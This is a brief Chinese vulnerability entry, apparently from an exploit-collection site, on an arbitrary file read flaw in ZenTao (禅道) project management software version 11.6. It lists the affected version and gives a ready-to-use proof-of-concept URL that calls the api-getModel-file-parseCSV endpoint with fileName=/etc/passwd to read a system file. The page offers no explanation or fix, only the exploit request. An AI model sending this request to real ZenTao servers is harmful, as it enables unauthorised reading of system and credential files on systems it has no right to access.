跳转至

禅道11.6任意文件读取

影响范围

禅道 11.6

漏洞POC

http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd 

img